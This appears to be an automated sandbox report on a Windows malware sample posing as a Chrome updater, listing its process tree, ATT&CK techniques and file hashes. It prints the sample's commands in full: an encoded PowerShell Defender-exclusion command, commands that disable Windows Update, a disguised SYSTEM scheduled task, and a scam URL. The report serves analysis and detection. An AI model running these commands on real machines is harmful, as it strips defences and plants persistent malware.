powershell -EncodedCommand "PAAjAHQAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcgBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAagB5AHoAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYwBuACMAPgA="
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1912

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
4⤵
PID:908

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
- Suspicious use of WriteProcessMemory
PID:1800

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
5⤵
- Modifies registry key
- Suspicious use of AdjustPrivilegeToken
PID:584

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:588

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
5⤵
PID:1824

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
5⤵
PID:1504

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
5⤵
PID:1400

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:2032

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1688

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
5⤵
PID:1900

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
5⤵
- Suspicious use of WriteProcessMemory
PID:908

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1632

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
5⤵
- Modifies registry key
- Suspicious use of AdjustPrivilegeToken
PID:380

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Chrome\updater.exe^"'
4⤵
PID:752

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Chrome\updater.exe"'
5⤵
- Creates scheduled task(s)
PID:1504

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
4⤵
PID:1420

C:\Windows\system32\schtasks.exe
schtasks /run /tn "GoogleUpdateTaskMachineQC"
5⤵
PID:528

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Windows\Temp\run.bat" "
2⤵
- Drops startup file
PID:1824

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Windows\Temp\lol.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:2016

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://take-realprize.life/?u=lq1pd08&o=hdck0gl
3⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1944

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1944 CREDAT:275457 /prefetch:2
4⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1732

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
1⤵
PID:584

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
1⤵
- Launches sc.exe
PID:380

C:\Windows\system32\sc.exe
sc stop bits
1⤵
- Launches sc.exe
PID:2036

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
1⤵
- Modifies registry key
PID:680

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
1⤵
PID:380

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
1⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1756

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
1⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1688

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
1⤵
- Modifies registry key
PID:692

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
1⤵
- Modifies registry key
PID:1544

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
1⤵
- Modifies registry key
PID:896

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:976

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
1⤵
- Modifies registry key
PID:1636

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1136

C:\Windows\system32\sc.exe
sc stop dosvc
1⤵
- Launches sc.exe
PID:960

C:\Windows\system32\sc.exe
sc stop wuauserv
1⤵
- Launches sc.exe
PID:752

C:\Windows\system32\sc.exe
sc stop UsoSvc
1⤵
- Modifies security service
- Launches sc.exe
PID:896

C:\Windows\system32\taskeng.exe
taskeng.exe {7ACAE8AA-746D-4900-A270-DC8207EAA187} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Loads dropped DLL
PID:924

C:\Program Files\Chrome\updater.exe
"C:\Program Files\Chrome\updater.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1612

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Program Files\Chrome\updater.exe"
3⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:900

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHQAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcgBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAagB5AHoAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYwBuACMAPgA="
4⤵
PID:2016

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAHQAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcgBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAagB5AHoAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYwBuACMAPgA="
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2036

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:1224

C:\Windows\system32\sc.exe
sc stop UsoSvc
5⤵
- Launches sc.exe
PID:836

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
5⤵
- Launches sc.exe
PID:1956

C:\Windows\system32\sc.exe
sc stop wuauserv
5⤵
- Launches sc.exe
PID:1692

C:\Windows\system32\sc.exe
sc stop bits
5⤵
- Launches sc.exe
PID:1644

C:\Windows\system32\sc.exe
sc stop dosvc
5⤵
- Launches sc.exe
PID:1640

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
5⤵
- Modifies registry key
PID:1696

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
5⤵
- Modifies registry key
PID:1692

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
5⤵
- Modifies registry key
PID:976

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
5⤵
- Modifies registry key
PID:752

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
5⤵
- Modifies registry key
PID:1612

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:584

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:844

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1032

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1900

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1640

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1176

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
5⤵
PID:1956

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
5⤵
PID:1692

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
5⤵
PID:976

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
5⤵
PID:752

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
5⤵
PID:1612

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
5⤵
PID:1240

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:1744

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
4⤵
PID:584

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:528

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2004

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:976

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1612

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
4⤵
PID:2032

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "sjsmjblqiv"
5⤵
PID:1400

C:\Windows\explorer.exe
C:\Windows\explorer.exe gicxwzitdcs1 aL9rWj13blqq3tQ6pq9BT64AEBTmmOZm2QnBzGRIrKyPM+h6GrlnTiw+84eQ+CjWwBvkP87y7fXUxvpWV+HOpwb4PFo0jfTYPIt8JLgpwB1l8+CPbjc8h5MGxwyuTAey5biMSNMXOCtrSwCAFGci43+J3ydPNcojjZuAczbPZ1dBIQ5NqMMQgtC0jINPHoADVgFiGvBTZc3nZKTrcuq8D5Q6HIf/EjJVDZjRZCe1iTbxWAKxZYSidMYzSzljVILede0zBXD0QgA8LeNhccfrjoe1LDMwWWGAFofnDuXZvQ3zrdnSD+cO2tUeQFc0Iw9P0SaQPBUTVX71xc7K3LubObahCWMZVHkFICc50uU8YhqdqKLvSuv0ElS+058KBhG7RyHoxTloFDhNM+dRe4uyDTloLV41p4EJnfF4X9pUtMZNFP5RMoJ0pPwpeeM2damF
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:844

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Impair Defenses

T1562

File Permissions Modification

T1222

Credential Access

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Chrome\updater.exe
Filesize
7.2MB

MD5
41fecdac1d345f98be3b3e236d8c22aa

SHA1
9206e0a7ed544ae9c086446d27840c390f91b869

SHA256
b24b4a7c194ce82574729a971378351e7c65e02fdc151e8ab72d1860ed1e55d1

SHA512
507ac2ddb4d21e5bad7bf04819aca7e9ffa4851a4bc08ea167b461a08a6e31394919efc940e52b881fb3487e68aa9765c6f29d77aa3b7c9fc99b699fe1e2f248

Download Submit
C:\Program Files\Chrome\updater.exe
Filesize
7.2MB

MD5
41fecdac1d345f98be3b3e236d8c22aa

SHA1
9206e0a7ed544ae9c086446d27840c390f91b869

SHA256
b24b4a7c194ce82574729a971378351e7c65e02fdc151e8ab72d1860ed1e55d1

SHA512
507ac2ddb4d21e5bad7bf04819aca7e9ffa4851a4bc08ea167b461a08a6e31394919efc940e52b881fb3487e68aa9765c6f29d77aa3b7c9fc99b699fe1e2f248

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
60KB

MD5
589c442fc7a0c70dca927115a700d41e

SHA1
66a07dace3afbfd1aa07a47e6875beab62c4bb31

SHA256
2e5cb72e9eb43baafb6c6bfcc573aac92f49a8064c483f9d378a9e8e781a526a

SHA512
1b5fa79e52be495c42cf49618441fb7012e28c02e7a08a91da9213db3ab810f0e83485bc1dd5f625a47d0ba7cfcdd5ea50acc9a8dcebb39f048c40f01e94155b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
340B

MD5
9069827504a86ec3c40f77dfcbc80925

SHA1
6f2d25d49966e7e1c84cc2540dd1271b736a5013

SHA256
0882b55b25b80cdcfb75d3b2d9c3921f4c69b1250789e20a990d1098c9ae7cd9

SHA512
2f54fc4e18ff8372af3451c661f26c4817a07cf86b94cf54a1ba9f0fdd28b3324b46bbd99b75c726a6f2691d5c5b022557161f5d516be409e25a418894a842c6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\IX6PZLH0.txt
Filesize
603B

MD5
e56a6836b23e3b1bcc1cd083e5b8f2db

SHA1
bc35df1bfb095fc2e62599c7824b429ef7ecbe71

SHA256
e1a6b19fb0a94b25ef8feaf12cf6c2dd03ce8a4e866ff0a24d78eadfdbb1fba3

SHA512
eac0d5c16fdf691e796e0defb8fcf786ffe3f58c4415a4a44af23a8e3d2999cb97f6232c59515e58daacc3c388b9d9f3b6de668ed8965169911080f5e9e267ad

Download Submit
C:\Windows\Temp\lol.bat
Filesize
59B

MD5
f580e0e80cc87b25e38ea2c0c8059d04

SHA1
299f51dca9c609d6da86f93c424e39c1e6ba0d94

SHA256
9e7b9ed63bd5dfe290fda58104cd98e8d23ba671d3ccb77e82e8b0f7812fb734

SHA512
5a0a1e4d3800ee76fc4d1d102ffe7e0d4e646c08f57f20c019741c3779ca85dc8a1240c77c90b0caef498859de960e71be3a81497b5ffac8b381aa2c7813e83d

Download Submit
C:\Windows\Temp\run.bat
Filesize
98B

MD5
731afe244b2414169a5f630d52646e56

SHA1
e3771ccdccd8c306ee5fc4f264cfc3310690458c

SHA256
6c24e5b6a9aaced68f9f93581913bdea4cc1077060827d5d59d6680859e4e552

SHA512
84e0dc44ae3eadf6d31484119294126f5a056add94733fea2ba5597b6a302fc107117f5c5029d4ce0ff8e5c859c4de9c456aa5f01d420f25a3d56dc569801ff1

Download Submit
C:\Windows\Temp\setup.exe
Filesize
7.2MB

MD5
41fecdac1d345f98be3b3e236d8c22aa

SHA1
9206e0a7ed544ae9c086446d27840c390f91b869

SHA256
b24b4a7c194ce82574729a971378351e7c65e02fdc151e8ab72d1860ed1e55d1

SHA512
507ac2ddb4d21e5bad7bf04819aca7e9ffa4851a4bc08ea167b461a08a6e31394919efc940e52b881fb3487e68aa9765c6f29d77aa3b7c9fc99b699fe1e2f248

Download Submit
C:\Windows\Temp\setup.exe
Filesize
7.2MB

MD5
41fecdac1d345f98be3b3e236d8c22aa

SHA1
9206e0a7ed544ae9c086446d27840c390f91b869

SHA256
b24b4a7c194ce82574729a971378351e7c65e02fdc151e8ab72d1860ed1e55d1

SHA512
507ac2ddb4d21e5bad7bf04819aca7e9ffa4851a4bc08ea167b461a08a6e31394919efc940e52b881fb3487e68aa9765c6f29d77aa3b7c9fc99b699fe1e2f248

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
1KB

MD5
f3f6968a4c0f457f427eb17f7cc5f68b

SHA1
872933578f4b7d555158189ed02015f192daa7c6

SHA256
774ad8ef51d495bfec8b3e3d058210d5ce715c66f76008f1e4f2b6203d33e41c

SHA512
5dafd8fb0cae325865c0a897e3719250903ac5da72b0fa5006ebda505ee625cd9eacf09c5043c3b3648a5677e96c87f1f2995712471cd1539cd9c73a7e3d0d49

Download Submit
\Program Files\Chrome\updater.exe
Filesize
7.2MB

MD5
41fecdac1d345f98be3b3e236d8c22aa

SHA1
9206e0a7ed544ae9c086446d27840c390f91b869

SHA256
b24b4a7c194ce82574729a971378351e7c65e02fdc151e8ab72d1860ed1e55d1

SHA512
507ac2ddb4d21e5bad7bf04819aca7e9ffa4851a4bc08ea167b461a08a6e31394919efc940e52b881fb3487e68aa9765c6f29d77aa3b7c9fc99b699fe1e2f248

Download Submit
\Windows\Temp\setup.exe
Filesize
7.2MB

MD5
41fecdac1d345f98be3b3e236d8c22aa

SHA1
9206e0a7ed544ae9c086446d27840c390f91b869

SHA256
b24b4a7c194ce82574729a971378351e7c65e02fdc151e8ab72d1860ed1e55d1

SHA512
507ac2ddb4d21e5bad7bf04819aca7e9ffa4851a4bc08ea167b461a08a6e31394919efc940e52b881fb3487e68aa9765c6f29d77aa3b7c9fc99b699fe1e2f248

Download Submit
memory/380-92-0x0000000000000000-mapping.dmp

Download
memory/380-99-0x0000000000000000-mapping.dmp

Download
memory/380-81-0x0000000000000000-mapping.dmp

Download
memory/528-111-0x0000000000000000-mapping.dmp

Download
memory/528-136-0x0000000000000000-mapping.dmp

Download
memory/584-98-0x0000000000000000-mapping.dmp

Download
memory/584-159-0x0000000000000000-mapping.dmp

Download
memory/584-82-0x0000000000000000-mapping.dmp

Download
memory/584-132-0x0000000000000000-mapping.dmp

Download
memory/588-100-0x0000000000000000-mapping.dmp

Download
memory/680-87-0x0000000000000000-mapping.dmp

Download
memory/692-93-0x0000000000000000-mapping.dmp

Download
memory/752-157-0x0000000000000000-mapping.dmp

Download
memory/752-96-0x0000000000000000-mapping.dmp

Download
memory/752-83-0x0000000000000000-mapping.dmp

Download
memory/836-134-0x0000000000000000-mapping.dmp

Download
memory/844-69-0x0000000000240000-0x000000000065C000-memory.dmp

Filesize
4.1MB

Download
memory/844-180-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/844-174-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/844-170-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/844-168-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/844-175-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/844-166-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/844-196-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/844-165-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/844-188-0x0000000000160000-0x0000000000180000-memory.dmp

Filesize
128KB

Download
memory/844-187-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/844-160-0x0000000000000000-mapping.dmp

Download
memory/844-186-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/844-176-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/844-178-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/844-172-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/844-181-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/844-182-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/844-68-0x000000001BA80000-0x000000001BE9C000-memory.dmp

Filesize
4.1MB

Download
memory/844-70-0x000007FEFBF51000-0x000007FEFBF53000-memory.dmp

Filesize
8KB

Download
memory/844-184-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/896-80-0x0000000000000000-mapping.dmp

Download
memory/896-90-0x0000000000000000-mapping.dmp

Download
memory/900-142-0x0000000000D50000-0x0000000000D56000-memory.dmp

Filesize
24KB

Download
memory/908-102-0x0000000000000000-mapping.dmp

Download
memory/908-79-0x0000000000000000-mapping.dmp

Download
memory/924-121-0x0000000001150000-0x0000000001DBE000-memory.dmp

Filesize
12.4MB

Download
memory/924-115-0x0000000001150000-0x0000000001DBE000-memory.dmp

Filesize
12.4MB

Download
memory/960-85-0x0000000000000000-mapping.dmp

Download
memory/976-156-0x0000000000000000-mapping.dmp

Download
memory/976-89-0x0000000000000000-mapping.dmp

Download
memory/976-139-0x0000000000000000-mapping.dmp

Download
memory/1032-161-0x0000000000000000-mapping.dmp

Download
memory/1092-54-0x0000000075F61000-0x0000000075F63000-memory.dmp

Filesize
8KB

Download
memory/1136-86-0x0000000000000000-mapping.dmp

Download
memory/1176-164-0x0000000000000000-mapping.dmp

Download
memory/1224-131-0x0000000000000000-mapping.dmp

Download
memory/1400-106-0x0000000000000000-mapping.dmp

Download
memory/1400-191-0x00000000002C0000-0x00000000002C6000-memory.dmp

Filesize
24KB

Download
memory/1400-190-0x0000000000060000-0x0000000000067000-memory.dmp

Filesize
28KB

Download
memory/1420-110-0x0000000000000000-mapping.dmp

Download
memory/1420-71-0x0000000000000000-mapping.dmp

Download
memory/1504-97-0x0000000000000000-mapping.dmp

Download
memory/1504-105-0x0000000000000000-mapping.dmp

Download
memory/1544-91-0x0000000000000000-mapping.dmp

Download
memory/1612-158-0x0000000000000000-mapping.dmp

Download
memory/1612-120-0x0000000000400000-0x000000000106E000-memory.dmp

Filesize
12.4MB

Download
memory/1612-119-0x00000000776D0000-0x0000000077879000-memory.dmp

Filesize
1.7MB

Download
memory/1612-118-0x00000000776D0000-0x0000000077879000-memory.dmp

Filesize
1.7MB

Download
